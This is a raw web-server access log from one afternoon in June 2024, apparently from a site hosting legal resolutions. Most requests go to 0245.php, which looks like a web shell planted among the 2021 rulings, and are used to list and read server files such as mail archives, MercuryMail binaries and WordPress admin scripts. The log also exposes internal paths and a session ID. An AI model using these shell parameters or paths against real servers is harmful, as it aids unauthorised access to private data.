47.128.123.160 - - [29/Jun/2024:17:24:17 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_php HTTP/1.1" 200 79
47.128.123.160 - - [29/Jun/2024:17:24:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=arrow_ltr HTTP/1.1" 200 88
47.128.30.0 - - [29/Jun/2024:17:24:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=ls&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cvehiculos%5Cimages&sort=0a HTTP/1.1" 200 11300
47.128.30.0 - - [29/Jun/2024:17:24:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_swf HTTP/1.1" 200 254
47.128.30.0 - - [29/Jun/2024:17:24:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_jpg HTTP/1.1" 200 175
47.128.30.0 - - [29/Jun/2024:17:24:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=arrow_ltr HTTP/1.1" 200 88
47.128.29.26 - - [29/Jun/2024:17:24:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Ctextiles%5Cimages&f=page111_thumbnail.jpg&ft=info HTTP/1.1" 200 3900
47.128.29.26 - - [29/Jun/2024:17:24:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_jpg HTTP/1.1" 200 175
47.128.29.26 - - [29/Jun/2024:17:24:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.29.26 - - [29/Jun/2024:17:24:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.29.26 - - [29/Jun/2024:17:24:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.29.26 - - [29/Jun/2024:17:24:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.29.26 - - [29/Jun/2024:17:24:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.29.26 - - [29/Jun/2024:17:24:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.29.26 - - [29/Jun/2024:17:24:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.29.26 - - [29/Jun/2024:17:24:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.29.26 - - [29/Jun/2024:17:24:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.36.95 - - [29/Jun/2024:17:24:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CMercuryMail&f=wpmmapi.exe&ft=info HTTP/1.1" 200 3470
47.128.36.95 - - [29/Jun/2024:17:24:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.36.95 - - [29/Jun/2024:17:24:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.36.95 - - [29/Jun/2024:17:24:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.36.95 - - [29/Jun/2024:17:24:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.36.95 - - [29/Jun/2024:17:24:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.36.95 - - [29/Jun/2024:17:24:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.36.95 - - [29/Jun/2024:17:24:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.36.95 - - [29/Jun/2024:17:24:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.36.95 - - [29/Jun/2024:17:24:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
201.245.192.253 - - [29/Jun/2024:17:24:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.13 - - [29/Jun/2024:17:25:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2294.pdf HTTP/1.1" 200 373449
66.249.66.13 - - [29/Jun/2024:17:25:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2007.pdf HTTP/1.1" 200 453693
47.128.116.74 - - [29/Jun/2024:17:25:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&base64=2&d=E%3A%5Cnuevo%5Cmailoutput%5C&f=mail-20150902-1651-10000.txt&ft=info HTTP/1.1" 200 4414
47.128.116.74 - - [29/Jun/2024:17:25:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.116.74 - - [29/Jun/2024:17:25:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.116.74 - - [29/Jun/2024:17:25:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.116.74 - - [29/Jun/2024:17:25:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.116.74 - - [29/Jun/2024:17:25:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.116.74 - - [29/Jun/2024:17:25:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.116.74 - - [29/Jun/2024:17:25:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.116.74 - - [29/Jun/2024:17:25:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.116.74 - - [29/Jun/2024:17:25:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
152.202.80.127 - - [29/Jun/2024:17:25:12 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1/j/nZ4x8ldFDlO1SxnJH2kgBcrSKLVkIQgnMtmSwHFiP5lHHJBKux/&y=U2FsdGVkX1/Kwo5E/z/SOI14UhiNoo6BsxctrhsjFoN380w86As7cXslbBK2i1IO HTTP/1.1" 200 30
152.202.80.127 - - [29/Jun/2024:17:25:12 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18PPgM7U8WrNhfLxNPXpSkftt7vMVquD61m3WySSW3qa1Wr5DTpTiG15IVLGuE/6YeyAbY0KMhk93vlhOKezjWJr/M9V7qz9K4=&u=U2FsdGVkX1+tlUvcHxKASxEojBJxnSnN+mk1wkjMho4nueHV2Np4zwBD2PLEY3Jf&y=U2FsdGVkX1/Kwo5E/z/SOI14UhiNoo6BsxctrhsjFoN380w86As7cXslbBK2i1IO HTTP/1.1" 200 97
152.202.80.127 - - [29/Jun/2024:17:25:12 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/4EpEE3/j4vPzTyj5TZFLnCO5q34xybNoOU8aPJ9wYqg6UzTVAGgtKcrZyxeBcDOFccf4SqwswiFiNoCjnGuRNyAiwc17LhXsSYicrKiYd3f5fCVLOENTP6erKjVlCLw/7MIg+tkdzaHydmUwdLD+Q8nGz2MkoEf+LF5XVKjfttVnOYXThcpH130RCUmk3JHiQi5em6tHwPT8jKfLAswt2FblfupISQRJsy+NhLhEue/n+5Ez9j6Z176C6hYGN9TzMEmQyfZKaKYWhulzqezIelgw50kCtC0fWHpnXEg80KE8rGZ31QtBc4+ss6Kjq1P9dWD3Kj7aAt78Nn2qnBdxY/b15iasukAGOUZmMjq/Ug3DsNtewLwjRlj+272QsVTRg5kn80TEXG8AZPm82IXgFykijv2waYz5HIcRKc0E0m9Fw/upScd7+P1gXJODUO3vZJTJnSMO0Fi4P1uc4I3PWy+9CLb+PJcTHuaVyZRPwK3QZlSV2BFZPRr7ds56xb2onct3r2KNY1yQFQzNhrp2wPiuIM0EJeiYBbyKvJlVNy9o78V7sIKMlFyKMaKgkjh74WJkIAHYpIdjl8XB686ieRJLukfEQ9jfZuqPounpIdsNBZuM3U0CvBrL1Qcqlmh4ri8KaldGd+h4KUceT84W4uEAQOHxruFYCC/R7vF8wwKkP7rbtvbSLi49ZIDf9Z2Kj9nUkvbB2ShHdYfi2UJSiT//8QZyQiS7eivyEyXLy4099td5eogRj5Ke+EyYNjBOiAwwOWYRYS8dTIzX+aaJ7LDRXhols0gBcvARmobadYD4yvYeH6QS8ZmpdEbvdHXZg6ZKLNtyUUYySLrcbJIj+eNzFsVRLoGvBy45/Go5tMQ+Xo/tDEkxoVJ5zo+LwdqxyYJTbTZ6JG6/NTz4PiQLlORXwe/EgfbtinTBYxDZ4lzmHR5rNZKLx3Qtzwt+3FCEkTPSuaATxgXxg1cVjgcBpIqaaV702scJACSY1KGL1f/7v55lKDjQ1Jfvw780PIHIKHosPYqiV4J5RdTYMb2htfKxPEsZZMW3+YvQQBEo4qfRBYSbHyrV18alYuVSbePdX/D8Lo5/yVzdAR8U/eQ4uysA0kV7ucevArdWEGxiH37ewwijLNfdCY+LcLrfgEx7y6TZmLdryX6z9uz2Wd7N2XewQuwYN+Wp4pKF8qijZfnSF4JTLeTjlKFgbH3xzStuZ4OI/Olf+OYB4F0m3SU0pPOyMs+Drmk8Aakb2XPjMtNeVDlwOOh2WrtuYQL5Ns1lAyV7SAX1X91/DkuHuzPOMHHrxuF285CWKhUH09wC17k8t2Lz0Vg0IFhPfRT2Nk6ZCub2KzOLz+W6IEzyEVz5ldA+sXo2FsHdd6fD3/nI57ooTPKulFqp2CZPfNFL+yJQcgCopBouo91q8E6o8C6wplTh54lse3vozRbNBMpbAAyuOzeNlXJ7EMnMgsUAdlItYL+hDJFoAub3b6Kc4LAlRfGELyQfY9WcMGHSmj6LTtuOhUZgADjeLzw6eodVAgMs4Xle0pQDDL9zxsqNgv2Inz39I9RXc08ZxplCnRewapG/M/B+FjyEbI03pSZYa49VXTYyMD3R8OPikwr7xGCHo6IyPRfiakAbrRfcqR7YR63Dtcnk8+YlwC6bwZf972+YY1YluqVCghixKU8xLR1lPs0DV/svsHA5NezEx67gQEEBhBCcGH8Zg6XqGEJEI2a4I0OIkTasuS4ypjXETurAHed5Om91BF/GjblmcK0VGDeF46gEiwNHf&u=U2FsdGVkX1+tlUvcHxKASxEojBJxnSnN+mk1wkjMho4nueHV2Np4zwBD2PLEY3Jf&y=U2FsdGVkX1/Kwo5E/z/SOI14UhiNoo6BsxctrhsjFoN380w86As7cXslbBK2i1IO HTTP/1.1" 200 736
152.202.80.127 - - [29/Jun/2024:17:25:12 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1939r31VFdaarXGzx2w+TZO6JpVtAARloBv92IylUkhxU5WKwd6ckM9AxmHLMGxWJQgwohn+J49x6zpHNhrdLnZQkH82Q1SZv+UH9EL4b2IINuZrI9hEA09SHllvyGhWYiqa04fSYSEbciYvagYFw8+ZxMd0y2CpFmiBrRX+8rCI9OMwkFwWpcw8kPLi8zQEcsKolXOcW+Br4tZHBeiMPGLXjtGeKF0LuFsgmbbMHW9qfTNeRt6wsJmE0nRKKDnChLAvkUCht7bxhJdduzFpYoVvZPpxu3D1KhSlQyeSGjOk9ElFJ8u+fTW2Rc0HbskE9FErA5yFf8aJ7KxW292fazlj9AYsB+TesO+3Kd8YLMlVr0LC+TduNOZP7wp1nJsW2pbspNMTW1KE/Re4b5EU/ufXpFfKfytoSN9HwtLsy8W/AQ5xS24OdoVNT1fcMxy8Ee19YhtrPD5gUyKPBVtToJ63x8KJrAZglQ099DWcB8AkiMpTEDsz4oJTv3FDFYvLzBI7ItgYsvPEEFp3BUbhVlGL5nrIfgn9BHZcN6SPlzX1ZeKENCGjkqd4RjZhes/sLf4MXVuZwyNxeCiQh6xNckbHS0Cg/MyvG7QHM2iG1g8A+dpveb1AbHjImpibgt3EQ8HeRhUrjx3FSTLNmun0j//DzhUNiNiWQGkFMdFltKED3NL3ekiHpYN38ojtUwNYmQCujAO1hNxxKrNw+wHT79kH6RIJZjKRiZsEzO6Qg/QbIOkO4lOuPGd&u=U2FsdGVkX1+tlUvcHxKASxEojBJxnSnN+mk1wkjMho4nueHV2Np4zwBD2PLEY3Jf&y=U2FsdGVkX1/Kwo5E/z/SOI14UhiNoo6BsxctrhsjFoN380w86As7cXslbBK2i1IO HTTP/1.1" 200 208
152.202.80.127 - - [29/Jun/2024:17:25:12 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX1/j/nZ4x8ldFDlO1SxnJH2kgBcrSKLVkIQgnMtmSwHFiP5lHHJBKux/ HTTP/1.1" 200 30244
47.128.36.118 - - [29/Jun/2024:17:25:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=ls&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clocale&sort=0a HTTP/1.1" 200 4346
47.128.36.118 - - [29/Jun/2024:17:25:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=arrow_ltr HTTP/1.1" 200 88
47.128.29.233 - - [29/Jun/2024:17:25:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&base64=4&d=E%3A%5Cnuevo%5Cmailoutput%5C&f=mail-20150212-2005-385000.txt&ft=info HTTP/1.1" 200 3675
47.128.29.233 - - [29/Jun/2024:17:25:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
157.55.39.56 - - [29/Jun/2024:17:25:30 -0500] "GET /Publicaciones/2024EE62938.pdf HTTP/1.1" 404 227
47.128.29.233 - - [29/Jun/2024:17:25:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.29.233 - - [29/Jun/2024:17:25:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.29.233 - - [29/Jun/2024:17:25:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.29.233 - - [29/Jun/2024:17:25:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.29.233 - - [29/Jun/2024:17:25:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.29.233 - - [29/Jun/2024:17:25:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.29.233 - - [29/Jun/2024:17:25:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.29.233 - - [29/Jun/2024:17:25:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.49.232 - - [29/Jun/2024:17:25:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cfarmaceutica%5Cfiles%5Csearch&f=search51.xml&ft=info HTTP/1.1" 200 3726
47.128.49.232 - - [29/Jun/2024:17:25:43 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.49.232 - - [29/Jun/2024:17:25:43 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.49.232 - - [29/Jun/2024:17:25:43 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.49.232 - - [29/Jun/2024:17:25:43 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.49.232 - - [29/Jun/2024:17:25:43 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.49.232 - - [29/Jun/2024:17:25:43 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.49.232 - - [29/Jun/2024:17:25:43 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.49.232 - - [29/Jun/2024:17:25:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.49.232 - - [29/Jun/2024:17:25:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_xml HTTP/1.1" 200 231
47.128.49.232 - - [29/Jun/2024:17:25:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.61.140 - - [29/Jun/2024:17:25:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=ls&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2024%5C&sort=1a HTTP/1.1" 200 11120
47.128.61.140 - - [29/Jun/2024:17:25:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_pdf HTTP/1.1" 200 1034
47.128.61.140 - - [29/Jun/2024:17:25:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=arrow_ltr HTTP/1.1" 200 88
201.245.192.253 - - [29/Jun/2024:17:25:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [29/Jun/2024:17:25:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.64.46 - - [29/Jun/2024:17:26:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1810.pdf HTTP/1.1" 200 295080
47.128.59.227 - - [29/Jun/2024:17:26:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-admin%5Cjs&f=password-strength-meter.js&ft=info HTTP/1.1" 200 3761
47.128.59.227 - - [29/Jun/2024:17:26:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.59.227 - - [29/Jun/2024:17:26:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.59.227 - - [29/Jun/2024:17:26:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.59.227 - - [29/Jun/2024:17:26:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.59.227 - - [29/Jun/2024:17:26:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.59.227 - - [29/Jun/2024:17:26:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.59.227 - - [29/Jun/2024:17:26:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.59.227 - - [29/Jun/2024:17:26:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.59.227 - - [29/Jun/2024:17:26:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.59.227 - - [29/Jun/2024:17:26:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_js HTTP/1.1" 200 131
157.55.39.56 - - [29/Jun/2024:17:26:12 -0500] "GET /BLA/resoluciones/AUTOS%202020/2868.pdf HTTP/1.1" 200 381408
47.128.30.244 - - [29/Jun/2024:17:26:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cfarmaceutica%5Cfiles%5Csearch&f=search25.xml&ft=info HTTP/1.1" 200 3724
47.128.30.244 - - [29/Jun/2024:17:26:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.30.244 - - [29/Jun/2024:17:26:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.30.244 - - [29/Jun/2024:17:26:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_xml HTTP/1.1" 200 231
47.128.30.244 - - [29/Jun/2024:17:26:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.30.244 - - [29/Jun/2024:17:26:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.30.244 - - [29/Jun/2024:17:26:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.30.244 - - [29/Jun/2024:17:26:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.30.244 - - [29/Jun/2024:17:26:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.30.244 - - [29/Jun/2024:17:26:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.30.244 - - [29/Jun/2024:17:26:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.39.88 - - [29/Jun/2024:17:26:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Cmailoutput&f=mail-20141107-1953-897000.txt&ft=info HTTP/1.1" 200 3651
47.128.39.88 - - [29/Jun/2024:17:26:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.39.88 - - [29/Jun/2024:17:26:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.39.88 - - [29/Jun/2024:17:26:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.39.88 - - [29/Jun/2024:17:26:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.39.88 - - [29/Jun/2024:17:26:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.39.88 - - [29/Jun/2024:17:26:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.39.88 - - [29/Jun/2024:17:26:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.39.88 - - [29/Jun/2024:17:26:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.39.88 - - [29/Jun/2024:17:26:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.59.182 - - [29/Jun/2024:17:26:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5Cjs%5Cjquery&f=jquery.hotkeys.js&ft=info HTTP/1.1" 200 3581
47.128.59.182 - - [29/Jun/2024:17:26:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.59.182 - - [29/Jun/2024:17:26:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_js HTTP/1.1" 200 131
47.128.59.182 - - [29/Jun/2024:17:26:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.59.182 - - [29/Jun/2024:17:26:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.59.182 - - [29/Jun/2024:17:26:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.59.182 - - [29/Jun/2024:17:26:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.59.182 - - [29/Jun/2024:17:26:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.59.182 - - [29/Jun/2024:17:26:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.59.182 - - [29/Jun/2024:17:26:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.59.182 - - [29/Jun/2024:17:26:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
216.245.221.92 - - [29/Jun/2024:17:26:49 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Jun/2024:17:26:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.63.213 - - [29/Jun/2024:17:26:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&base64=1&d=E%3A%5Cnuevo%5CMercuryMail%5C&f=bearhlp-it.htm&ft=info HTTP/1.1" 200 12347
47.128.63.213 - - [29/Jun/2024:17:26:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.63.213 - - [29/Jun/2024:17:26:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.63.213 - - [29/Jun/2024:17:26:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.63.213 - - [29/Jun/2024:17:26:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.63.213 - - [29/Jun/2024:17:26:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.63.213 - - [29/Jun/2024:17:26:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.63.213 - - [29/Jun/2024:17:27:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.63.213 - - [29/Jun/2024:17:27:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.63.213 - - [29/Jun/2024:17:27:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.63.213 - - [29/Jun/2024:17:27:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_htm HTTP/1.1" 200 79
172.22.2.4 - - [29/Jun/2024:17:25:30 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [29/Jun/2024:17:27:08 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35403
201.245.192.253 - - [29/Jun/2024:17:27:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35140
201.245.192.253 - - [29/Jun/2024:17:27:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [29/Jun/2024:17:27:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [29/Jun/2024:17:26:20 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
